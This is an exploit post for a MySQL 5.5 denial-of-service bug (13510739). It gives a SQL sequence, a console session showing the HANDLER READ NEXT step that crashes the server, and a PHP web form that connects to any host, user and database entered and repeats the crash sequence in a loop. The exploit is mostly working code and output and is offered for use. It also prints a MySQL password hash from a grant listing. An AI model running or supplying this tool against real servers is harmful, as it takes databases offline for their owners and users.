CREATE TABLE bug13510739 (c INTEGER NOT NULL, PRIMARY KEY (c)) ENGINE=INNODB;

INSERT INTO bug13510739 VALUES (1), (2), (3), (4);

DELETE FROM bug13510739 WHERE c=2;

HANDLER bug13510739 OPEN;

HANDLER bug13510739 READ `primary` = (2);

# this one crashes the server IF the bug IS present
HANDLER bug13510739 READ `primary` NEXT;

DROP TABLE bug13510739;

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show tables \g
ERROR 1046 (3D000): No database selected
mysql> show databases \g
+--------------------+
| Database           |
+--------------------+
| information_schema |
| sed165             |
+--------------------+
2 rows in set (0.00 sec)

mysql> \s
--------------
mysql  Ver 14.14 Distrib 5.5.21, for Win32 (x86)

Connection id:          5
Current database:
Current user:           sed165@localhost
SSL:                    Not in use
Using delimiter:        ;
Server version:         5.5.21 MySQL Community Server (GPL)
Protocol version:       10
Connection:             localhost via TCP/IP
Server characterset:    latin1
Db     characterset:    latin1
Client characterset:    latin1
Conn.  characterset:    latin1
TCP port:               3306
Uptime:                 5 min 33 sec

Threads: 1  Questions: 18  Slow queries: 0  Opens: 35  Flush tables: 1  Open tables: 28  Queries per second avg: 0.054
--------------

mysql> show grants for  'sed165'@'%' \g
+-------------------------------------------------------------------------------------------------------+
| Grants for sed165@%                                                                                   |
+-------------------------------------------------------------------------------------------------------+
| GRANT USAGE ON *.* TO 'sed165'@'%' IDENTIFIED BY PASSWORD '*803F09BD31CC02F76D5D5C5451D00C8CDA4E9A15' |
| GRANT ALL PRIVILEGES ON `sed165`.* TO 'sed165'@'%' WITH GRANT OPTION                                  |
+-------------------------------------------------------------------------------------------------------+
2 rows in set (0.00 sec)

mysql> use sed165 \g
Query OK, 0 rows affected (0.00 sec)

mysql> CREATE TABLE bug13510739 (c INTEGER NOT NULL, PRIMARY KEY (c)) ENGINE=INNODB;
Query OK, 0 rows affected (0.11 sec)

mysql>
mysql> INSERT INTO bug13510739 VALUES (1), (2), (3), (4);
Query OK, 4 rows affected (0.01 sec)
Records: 4  Duplicates: 0  Warnings: 0

mysql>
mysql> DELETE FROM bug13510739 WHERE c=2;
Query OK, 1 row affected (0.05 sec)

mysql>
mysql> HANDLER bug13510739 OPEN;
Query OK, 0 rows affected (0.00 sec)

mysql>
mysql> HANDLER bug13510739 READ `primary` = (2);
Empty set (0.00 sec)

mysql>
mysql> # this one crashes the server IF the bug IS present
mysql> HANDLER bug13510739 READ `primary` NEXT;


Mysql Server Crash Olur burada.(Denial Of Service)

<html>
<head>
<style type="text/css">
body
{
background-color:black;
color:red;
}
</style>
<table border="1">
<form name="dostest" method="post" action="">
<tr><td><label><ul><li>Mysql Server (Host):</li></ul></label>
<td><input type="text" name="host" id="host" size="40"/></td></tr>

<tr><td><label><ul><li>Mysql User:</li></ul></label>
<td><input type="text" name="user" id="user" size="40" /></td></tr>


<tr><td><label><ul><li>Mysql Userin Parolu:</li></ul></label>
<td><input type="text" name="pass" id="pass" size="40" /></td></tr>

<tr><td><label><ul><li>Mysql Database:(Baza)</li></ul></label>
<td><input type="text" name="database" id="database" size="40" /></td></tr>

</table>
<?php echo str_repeat('<ul>'. PHP_EOL,3);?>
<input type="submit" name="s2k" id="s2k" value="Exploit Et Gor nese Alinir?)" />
<?php echo str_repeat('</ul>'. PHP_EOL,3);?>
</form>








<?php
/*
Coded By AkaStep

Vuln Discovered by:(eromang)
http://pastebin.com/tCxNTD96

*/
error_reporting('off');
if(isset($_POST['s2k']) && isset($_POST['host']) && !empty($_POST['host']) && isset($_POST['user']) && !empty($_POST['user']) && isset($_POST['pass'])
&&!empty($_POST['pass']) && isset($_POST['database']) && !empty($_POST['database']))
{

$_POST=array_map('htmlentities',$_POST);

$mysqlhost=$_POST['host'];
$mysqluser=$_POST['user'];
$mysqluserpass=$_POST['pass'];
$mysql_db=$_POST['database'];

//die(var_dump($_POST));


/* EXPLOIT */

$sl=mysql_connect($mysqlhost,$mysqluser,$mysqluserpass) or die('Qosula Bilmirem Mysql Servere');
$selectdb=mysql_selectdb($mysql_db) or die('Database Yoxdur! Yaxud Grant Yoxdur:*(');
echo '1)Exploit Edirik.Gorek ne olur)) Gozle...<br>';

for($i=0;$i<=3;$i++)
{

mysql_query('DROP TABLE IF EXISTS `bug13510739`',$sl) or die('Icra Ede bilmirem: #0 ()');
mysql_query('CREATE TABLE `bug13510739` (c INTEGER NOT NULL, PRIMARY KEY (c)) ENGINE=INNODB',$sl) or die('Icra Ede bilmirem: #1 ()');
mysql_query('INSERT INTO `bug13510739` VALUES (1), (2), (3), (4)') or die('icra Ede bilmirem #2');
mysql_query('DELETE FROM bug13510739 WHERE c=2') or die('Icra ede bilmirem #3');
mysql_query('HANDLER bug13510739 OPEN') or die('Icra ede bilmirem #4');
mysql_query('HANDLER bug13510739 READ `primary` = (2)') or die('Icra ede bilmirem #5');
mysql_query('HANDLER bug13510739 READ `primary` NEXT')  or die('Icra ede bilmirem #6');
mysql_query('DROP TABLE bug13510739') or die('icra ede bilmirem! #7');
}


die('2)Exploit edildi. <br>
3)Son.<br>
4)Server Down-a Getse Demeli Vulnerabledir MYSQL. Update Etmelisen.<br>');
/* EOF */
}
?>